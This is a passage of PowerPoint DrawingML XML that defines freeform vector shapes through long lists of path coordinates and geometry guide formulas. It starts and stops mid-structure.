                    <a:lnTo>
                      <a:pt x="497" y="1012"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="476" y="1005"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="465" y="998"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="458" y="998"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="448" y="996"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="435" y="994"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="419" y="991"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="402" y="988"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="382" y="985"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="980"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="976"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="321" y="973"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="301" y="968"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="281" y="965"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="264" y="963"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="248" y="960"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="235" y="958"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="225" y="958"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="218" y="958"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="952"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="203" y="945"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="939"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="932"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="925"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="920"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="916"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="913"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="905"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="887"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="860"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="829"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="798"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="768"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="744"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="729"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="697"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="660"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="629"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="611"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="603"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="568"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="547"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="528"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="510"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="496"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="490"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="488"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="484"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="482"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="480"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="477"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="472"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="453"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="443"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="208" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="219" y="429"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="223" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="422"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="249" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="406"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="301" y="396"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="327" y="385"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="375"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="369" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="375" y="365"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="382" y="359"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392" y="350"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="402" y="339"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="407" y="332"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="409" y="314"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="413" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="418" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="421" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="450" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="455" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="461" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="468" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="474" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="483" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="489" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="495" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="13"/>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085" name="Freeform 91"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="413" y="2414"/>
                <a:ext cx="161" cy="49"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 491"/>
                  <a:gd name="T1" fmla="*/ 0 h 151"/>
                  <a:gd name="T2" fmla="*/ 0 w 491"/>
                  <a:gd name="T3" fmla="*/ 0 h 151"/>
                  <a:gd name="T4" fmla="*/ 0 w 491"/>
                  <a:gd name="T5" fmla="*/ 0 h 151"/>
                  <a:gd name="T6" fmla="*/ 0 w 491"/>
                  <a:gd name="T7" fmla="*/ 0 h 151"/>
                  <a:gd name="T8" fmla="*/ 0 w 491"/>
                  <a:gd name="T9" fmla="*/ 0 h 151"/>
                  <a:gd name="T10" fmla="*/ 0 w 491"/>
                  <a:gd name="T11" fmla="*/ 0 h 151"/>
                  <a:gd name="T12" fmla="*/ 0 w 491"/>
                  <a:gd name="T13" fmla="*/ 0 h 151"/>
                  <a:gd name="T14" fmla="*/ 0 w 491"/>
                  <a:gd name="T15" fmla="*/ 0 h 151"/>
                  <a:gd name="T16" fmla="*/ 0 w 491"/>
                  <a:gd name="T17" fmla="*/ 0 h 151"/>
                  <a:gd name="T18" fmla="*/ 0 w 491"/>
                  <a:gd name="T19" fmla="*/ 0 h 151"/>
                  <a:gd name="T20" fmla="*/ 0 w 491"/>
                  <a:gd name="T21" fmla="*/ 0 h 151"/>
                  <a:gd name="T22" fmla="*/ 0 w 491"/>
                  <a:gd name="T23" fmla="*/ 0 h 151"/>
                  <a:gd name="T24" fmla="*/ 0 w 491"/>
                  <a:gd name="T25" fmla="*/ 0 h 151"/>
                  <a:gd name="T26" fmla="*/ 0 w 491"/>
                  <a:gd name="T27" fmla="*/ 0 h 151"/>
                  <a:gd name="T28" fmla="*/ 0 w 491"/>
                  <a:gd name="T29" fmla="*/ 0 h 151"/>
                  <a:gd name="T30" fmla="*/ 0 w 491"/>
                  <a:gd name="T31" fmla="*/ 0 h 151"/>
                  <a:gd name="T32" fmla="*/ 0 w 491"/>
                  <a:gd name="T33" fmla="*/ 0 h 151"/>
                  <a:gd name="T34" fmla="*/ 0 w 491"/>
                  <a:gd name="T35" fmla="*/ 0 h 151"/>
                  <a:gd name="T36" fmla="*/ 0 w 491"/>
                  <a:gd name="T37" fmla="*/ 0 h 151"/>
                  <a:gd name="T38" fmla="*/ 0 w 491"/>
                  <a:gd name="T39" fmla="*/ 0 h 151"/>
                  <a:gd name="T40" fmla="*/ 0 w 491"/>
                  <a:gd name="T41" fmla="*/ 0 h 151"/>
                  <a:gd name="T42" fmla="*/ 0 w 491"/>
                  <a:gd name="T43" fmla="*/ 0 h 151"/>
                  <a:gd name="T44" fmla="*/ 0 w 491"/>
                  <a:gd name="T45" fmla="*/ 0 h 151"/>
                  <a:gd name="T46" fmla="*/ 0 w 491"/>
                  <a:gd name="T47" fmla="*/ 0 h 151"/>
                  <a:gd name="T48" fmla="*/ 0 w 491"/>
                  <a:gd name="T49" fmla="*/ 0 h 151"/>
                  <a:gd name="T50" fmla="*/ 0 w 491"/>
                  <a:gd name="T51" fmla="*/ 0 h 151"/>
                  <a:gd name="T52" fmla="*/ 0 w 491"/>
                  <a:gd name="T53" fmla="*/ 0 h 151"/>
                  <a:gd name="T54" fmla="*/ 0 w 491"/>
                  <a:gd name="T55" fmla="*/ 0 h 151"/>
                  <a:gd name="T56" fmla="*/ 0 w 491"/>
                  <a:gd name="T57" fmla="*/ 0 h 151"/>
                  <a:gd name="T58" fmla="*/ 0 w 491"/>
                  <a:gd name="T59" fmla="*/ 0 h 151"/>
                  <a:gd name="T60" fmla="*/ 0 w 491"/>
                  <a:gd name="T61" fmla="*/ 0 h 151"/>
                  <a:gd name="T62" fmla="*/ 0 w 491"/>
                  <a:gd name="T63" fmla="*/ 0 h 151"/>
                  <a:gd name="T64" fmla="*/ 0 w 491"/>
                  <a:gd name="T65" fmla="*/ 0 h 151"/>
                  <a:gd name="T66" fmla="*/ 0 w 491"/>
                  <a:gd name="T67" fmla="*/ 0 h 151"/>
                  <a:gd name="T68" fmla="*/ 0 w 491"/>
                  <a:gd name="T69" fmla="*/ 0 h 151"/>
                  <a:gd name="T70" fmla="*/ 0 w 491"/>
                  <a:gd name="T71" fmla="*/ 0 h 151"/>
                  <a:gd name="T72" fmla="*/ 0 w 491"/>
                  <a:gd name="T73" fmla="*/ 0 h 151"/>
                  <a:gd name="T74" fmla="*/ 0 w 491"/>
                  <a:gd name="T75" fmla="*/ 0 h 151"/>
                  <a:gd name="T76" fmla="*/ 0 w 491"/>
                  <a:gd name="T77" fmla="*/ 0 h 151"/>
                  <a:gd name="T78" fmla="*/ 0 w 491"/>
                  <a:gd name="T79" fmla="*/ 0 h 151"/>
                  <a:gd name="T80" fmla="*/ 0 w 491"/>
                  <a:gd name="T81" fmla="*/ 0 h 151"/>
                  <a:gd name="T82" fmla="*/ 0 w 491"/>
                  <a:gd name="T83" fmla="*/ 0 h 151"/>
                  <a:gd name="T84" fmla="*/ 0 w 491"/>
                  <a:gd name="T85" fmla="*/ 0 h 151"/>
                  <a:gd name="T86" fmla="*/ 0 w 491"/>
                  <a:gd name="T87" fmla="*/ 0 h 151"/>
                  <a:gd name="T88" fmla="*/ 0 w 491"/>
                  <a:gd name="T89" fmla="*/ 0 h 151"/>
                  <a:gd name="T90" fmla="*/ 0 w 491"/>
                  <a:gd name="T91" fmla="*/ 0 h 151"/>
                  <a:gd name="T92" fmla="*/ 0 w 491"/>
                  <a:gd name="T93" fmla="*/ 0 h 151"/>
                  <a:gd name="T94" fmla="*/ 0 w 491"/>
                  <a:gd name="T95" fmla="*/ 0 h 151"/>
                  <a:gd name="T96" fmla="*/ 0 w 491"/>
                  <a:gd name="T97" fmla="*/ 0 h 151"/>
                  <a:gd name="T98" fmla="*/ 0 w 491"/>
                  <a:gd name="T99" fmla="*/ 0 h 151"/>
                  <a:gd name="T100" fmla="*/ 0 w 491"/>
                  <a:gd name="T101" fmla="*/ 0 h 151"/>
                  <a:gd name="T102" fmla="*/ 0 w 491"/>
                  <a:gd name="T103" fmla="*/ 0 h 151"/>
                  <a:gd name="T104" fmla="*/ 0 w 491"/>
                  <a:gd name="T105" fmla="*/ 0 h 151"/>
                  <a:gd name="T106" fmla="*/ 0 w 491"/>
                  <a:gd name="T107" fmla="*/ 0 h 151"/>
                  <a:gd name="T108" fmla="*/ 0 w 491"/>
                  <a:gd name="T109" fmla="*/ 0 h 15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1"/>
                  <a:gd name="T166" fmla="*/ 0 h 151"/>
                  <a:gd name="T167" fmla="*/ 491 w 491"/>
                  <a:gd name="T168" fmla="*/ 151 h 15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1" h="151">
                    <a:moveTo>
                      <a:pt x="158" y="18"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="164" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="224" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="248" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="270" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="287" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="295" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="307" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="316" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="346" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="355" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="372" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="397" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="397" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="397" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="402" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="413" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="427" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="443" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="459" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="474" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="485" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="491" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="491" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="491" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="489" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="484" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="480" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="474" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="466" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="458" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="450" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="443" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="438" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="437" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="442" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="461" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="466" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="461" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="455" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="447" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="440" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="433" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="427" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="422" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="419" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="413" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="406" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="400" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="398" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="402" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="413" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="423" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="427" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="424" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="421" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="416" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="397" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="390" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="384" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="355" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="340" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="324" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="311" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="301" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="295" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="293" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="292" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="290" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="288" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="286" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="280" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="277" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="276" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="249" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="238" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="227" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="217" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="203" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="18"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="CC0A2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086" name="Freeform 92"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="418" y="2417"/>
                <a:ext cx="61" cy="41"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 189"/>
                  <a:gd name="T1" fmla="*/ 0 h 125"/>
                  <a:gd name="T2" fmla="*/ 0 w 189"/>
                  <a:gd name="T3" fmla="*/ 0 h 125"/>
                  <a:gd name="T4" fmla="*/ 0 w 189"/>
                  <a:gd name="T5" fmla="*/ 0 h 125"/>
                  <a:gd name="T6" fmla="*/ 0 w 189"/>
                  <a:gd name="T7" fmla="*/ 0 h 125"/>
                  <a:gd name="T8" fmla="*/ 0 w 189"/>
                  <a:gd name="T9" fmla="*/ 0 h 125"/>
                  <a:gd name="T10" fmla="*/ 0 w 189"/>
                  <a:gd name="T11" fmla="*/ 0 h 125"/>
                  <a:gd name="T12" fmla="*/ 0 w 189"/>
                  <a:gd name="T13" fmla="*/ 0 h 125"/>
                  <a:gd name="T14" fmla="*/ 0 w 189"/>
                  <a:gd name="T15" fmla="*/ 0 h 125"/>
                  <a:gd name="T16" fmla="*/ 0 w 189"/>
                  <a:gd name="T17" fmla="*/ 0 h 125"/>
                  <a:gd name="T18" fmla="*/ 0 w 189"/>
                  <a:gd name="T19" fmla="*/ 0 h 125"/>
                  <a:gd name="T20" fmla="*/ 0 w 189"/>
                  <a:gd name="T21" fmla="*/ 0 h 125"/>
                  <a:gd name="T22" fmla="*/ 0 w 189"/>
                  <a:gd name="T23" fmla="*/ 0 h 125"/>
                  <a:gd name="T24" fmla="*/ 0 w 189"/>
                  <a:gd name="T25" fmla="*/ 0 h 125"/>
                  <a:gd name="T26" fmla="*/ 0 w 189"/>
                  <a:gd name="T27" fmla="*/ 0 h 125"/>
                  <a:gd name="T28" fmla="*/ 0 w 189"/>
                  <a:gd name="T29" fmla="*/ 0 h 125"/>
                  <a:gd name="T30" fmla="*/ 0 w 189"/>
                  <a:gd name="T31" fmla="*/ 0 h 125"/>
                  <a:gd name="T32" fmla="*/ 0 w 189"/>
                  <a:gd name="T33" fmla="*/ 0 h 125"/>
                  <a:gd name="T34" fmla="*/ 0 w 189"/>
                  <a:gd name="T35" fmla="*/ 0 h 125"/>
                  <a:gd name="T36" fmla="*/ 0 w 189"/>
                  <a:gd name="T37" fmla="*/ 0 h 125"/>
                  <a:gd name="T38" fmla="*/ 0 w 189"/>
                  <a:gd name="T39" fmla="*/ 0 h 125"/>
                  <a:gd name="T40" fmla="*/ 0 w 189"/>
                  <a:gd name="T41" fmla="*/ 0 h 125"/>
